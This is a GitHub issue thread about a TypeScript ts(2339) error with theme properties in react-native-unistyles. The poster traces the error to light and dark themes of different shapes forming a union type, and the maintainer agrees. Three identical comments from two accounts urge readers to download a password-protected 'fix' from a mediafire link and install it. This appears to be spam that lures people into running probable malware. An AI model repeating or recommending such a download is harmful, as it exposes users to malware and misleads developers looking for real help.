### ISSUE TITLE
Custom properties not recognized through TypeScript in theme ( ts(2339) )

### ISSUE THREAD

**Issue by 404mat** [jpudysz/react-native-unistyles#269]
### Description

Hi ! 
I installed the package as per the documentation, but when i try to use the colors and other properties I added into the stylesheets, I get a TypeScript error as if the property does not exist.
The code compiles and the colors appear fine in the simulator I'm using, but my files appear as containing this type error.

Here is my config :
![image](https://github.com/user-attachments/assets/5f1b8dee-34d8-4c89-976b-771177341d9a)

Here is my theme :
![image](https://github.com/user-attachments/assets/3d5df826-f1d3-4a60-bd85-7ad1405d9abe)

I use the spread operator to include my design system into the object, but the final object looks something like this (just to let you know, the error still exists even when I dont use the spread operator and I input the values manually):
![CleanShot 2024-08-26 at 22 36 22@2x](https://github.com/user-attachments/assets/a61f1ec1-311b-435d-b3f3-5d4a30fe8503)

Here is the type error :
![CleanShot 2024-08-26 at 22 28 08@2x](https://github.com/user-attachments/assets/bdf15e90-1bb6-4b26-8953-34607bb9b094)

Let me know if you want more info about the config, I can give it to you. To also note : this issue resembles this other one : https://github.com/jpudysz/react-native-unistyles/issues/228 , but I'm on VSCode, and I neither use `useInitialTheme` nor `adaptiveThemes` in my codebase.

### Steps to reproduce

1. Create an app using Expo
2. Install `react-native-unistyles`
3. Create `theme.ts` and `unistyles.ts` files, and configure like the documentation, and import into the App.tsx
4. try and use one of the theme properties in a stylesheet provided by the library (createStyleSheet)

### Unistyles version

2.9.1

### React Native version

0.74.5

### Platforms

iOS

### Engine

Hermes

### Architecture

Fabric (new)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jpudysz** [comment]
Whatever you spread mark it type as "as const" for TypeScript. 

https://www.totaltypescript.com/concepts/as-const

**Comment by 404mat** [comment]
Thanks for your response ! I tried your suggestion but no success.
I took a bit of time to try and reproduce the problem and show it to you. You can find it here : https://github.com/404mat/rn-unistyles-ts-problem
I tried this reproduction on 3 computers (2 Windows,1 Mac) and TypeScript struggles in the 3 cases.

**Comment by 404mat** [comment]
I've kept searching for a resolution to this case after work, and found something that may be a clue, I don't really know.
![CleanShot 2024-08-27 at 17 32 21@2x](https://github.com/user-attachments/assets/4ca8d82f-240d-4463-8c6e-427f1aa951a5)
There are 2 objects that are separated by the pipe operator, but I still don't know why TypeScript does not recognize the first object as valid.

**Comment by 404mat** [comment]
Found it...

The issue here is that the `theme.colors` object is a union type, meaning it can be one of two possible types : `lightTheme` or `darkTheme`.  If `lightTheme` has a property that `darkTheme` does not have, TypeScript will complain because (if I understand correctly) at runtime, it could be either of those and if one of theme is not defined then **boom**.

![image](https://github.com/user-attachments/assets/874aced4-a127-4f8f-b2c8-213260539726)

Being in the early phase of development, I only focused on `lightTheme` for now, which is why I both did not match exactly.

I think this should be added to the documentation, so that the warning for objects of different shapes is more explicit (also a call for myself to read the documentation harder if I have an issue 😄 )

![image](https://github.com/user-attachments/assets/cd59e3fb-8ad0-417b-a3b6-edd741ddaad9)

I don't know if you have a public repo for the doc, if you don't have time to think about this I could make a pull request with the changes and show it to you. let me know !

Fell free to close this issue if you want @jpudysz !

**Comment by jpudysz** [comment]
makes total sense ;) I've never used different shapes. Although it's possible in v.2.x and 3.x it's still not recommended. Now you found real reason why! 

I will happily accept the PR, you can edit "Tip" with more details. Documentation lives under `docs` folder and it's written in Astro.
